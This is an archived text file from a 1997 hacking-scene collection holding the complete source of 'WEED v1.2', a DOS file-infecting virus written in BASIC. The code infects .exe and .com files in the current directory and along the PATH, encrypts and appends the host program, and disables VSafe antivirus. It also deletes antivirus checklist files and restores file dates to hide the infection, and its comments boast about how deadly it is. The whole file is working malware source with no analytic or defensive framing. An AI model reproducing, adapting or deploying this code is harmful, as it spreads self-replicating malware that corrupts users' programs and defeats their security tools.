home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CASIOCOL.ZIP
/
WEEDV12.ZIP
/
WEEDV12.ASI
< prev
next >
Wrap
Text File
|
1997-03-15
|
9KB
|
417 lines
dim virus_data(5590)
dim host_data(5590)
randomize
rem Define our encrypted data for later decryption. Data is encrypted
rem during the compilation process. Do not tamper with tables in source!
weedmsg$="WEED v1.2 - CASiO [RAiDERZ CoDERZ] - USA - 1997"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
newattr=0
gosub vsafe_toggle:
vsafebak=newattr
gosub toast_them:
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
rem My new WEED virus! Oh so much more deadly! So much more spiffy!
filename$=hostname$
hostsize&=filelen(filename$)
virus_size=5590
virus_size&=5590&
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, now infect files presently in current directory!
subdir=0
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
rem Ok, now were going to target files along the path :)
for n=0 to 100
call sub "path", n, virupath$
i=LEN(virupath$)
if i=0 then done:
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
out1$="*.exe"
out2$="*.com"
subdir=1
proc$=virupath$+out1$
gosub start_virus:
proc$=virupath$+out2$
gosub start_virus:
next n
done:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub dec_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
a=rnd(0)
a=a mod 10
a=a+1
if a=1 then
rem Ok, run Stars Section, if they press "/" we allow them to run
rem original program!
call sub "Stars_heh"
endif
if a=7 then
rem Time to print message! :)
print weedmsg$
a=5*18
gosub pause_exec:
endif
call hostname$, yourparm$
newattr=0
gosub vsafe_toggle:
filename$=hostname$
gosub lets_infect:
rem Hmm, lets see if our new host was able to make any files!
subdir=0
proc$="*.exe"
gosub start_virus:
proc$="*.com"
gosub start_virus:
newattr=vsafebak
gosub vsafe_toggle:
end
rem We have completed replication. all stop!
start_virus:
errcode=0
attr=6
kewl=0
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
if subdir=1 then
filename$=virupath$+filename$
endif
gosub test_safe:
if safe=1 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
endif
CALL SUB "FindNextF" ErrCode
if kewl>4 then
errcode=1
endif
WEND
return
Lets_infect:
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub enc_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE!
REM ******* THESE AREAS MUST NOT BE FOOLED WITH!
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=newattr
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
newattr=bx
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
chklist:
temp1$=filename$
filename$=kill_this$
newattr=0
gosub set_attr:
kill filename$
filename$=temp1$
return
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem be sure to set variable move_way to whereever you wish to go
rem it can be a long integer :-)
rem get the target location, divide that by 65536
rem Also subtract value of a& from the original size.
rem set both registers for real numbers, no mistake here.. Will fuckup
rem file pointer routine if I don't. :)
rem a&=move_way&/65536&
rem b&=a&-move_way&
rem a&=abs(a&)
rem b&=abs(b&)
rem Now, dump the registers :)
rem if file_handle>4 then
rem ax=&hex4200
rem cx=a&
rem dx=b&
rem bx=file_handle
rem Ok, now that we have prepared the registers, Lets fix them!
rem if cx<0 then
rem cx=cx+32767
rem endif
rem if dx<0 then
rem dx=dx+32767
rem endif
rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
rem endif
rem return
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
enc_host:
rem Routine to encrypt the host data... We encrypt it before
rem appending. Yea, the encryption is lame... But it serves it's
rem purpose fine.
for x=0 to virus_size
a=host_data(x)
a=a+127
a=a+192
a=a+x
host_data(x)=a
next x
return
dec_host:
rem Routine to decrypt the host data... We need to decrypt it before
rem replacing it and passing control to it. And yes, the decryption
rem sequence is lame... But, I don't give a fuck!
for x=0 to virus_size
a=host_data(x)
a=a-127
a=a-192
a=a-x
host_data(x)=a
next x
return
infect_check:
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=""
open"r",1,filename$
a=filepos(1,28)
for z=1 to 4
input #1,y$ byte
sig$=sig$+y$
next z
close 1
newattr=oldattr
gosub set_attr:
if sig$="╘┘Σ█" then
infected=1
else
infected=0
endif
return
strip_garbage:
open"r",1,filename$
a=filepos(1,hosttemp&)
print #1,"" NONULL
CLOSE 1
gosub open_file:
gosub set_fdt:
gosub close_file:
return
pause_exec:
REM 5 sec. timer routine from original QBasic source code written by:
REM obother@netcom.com (Glen Blankenship)
REM (5 * 18.2 clock-ticks-per-second = 91)
TickOne = TIMER
FOR i = 1 TO a
TickTwo = TickOne
WHILE TickTwo = TickOne
TickOne = TIMER
WEND
NEXT i
RETURN
toast_them:
kill_this$=killfil1$
gosub chklist:
kill_this$=killfil2$
gosub chklist:
kill_this$=killfil3$
gosub chklist:
return
test_safe:
openmode=0
sharing=0
errcode1=0
call sub "Fopen" filename$ openmode sharing test_handle errcode1
if errcode1=0 then
call sub "Fclose" test_handle
safe=1
else
safe=0
endif
return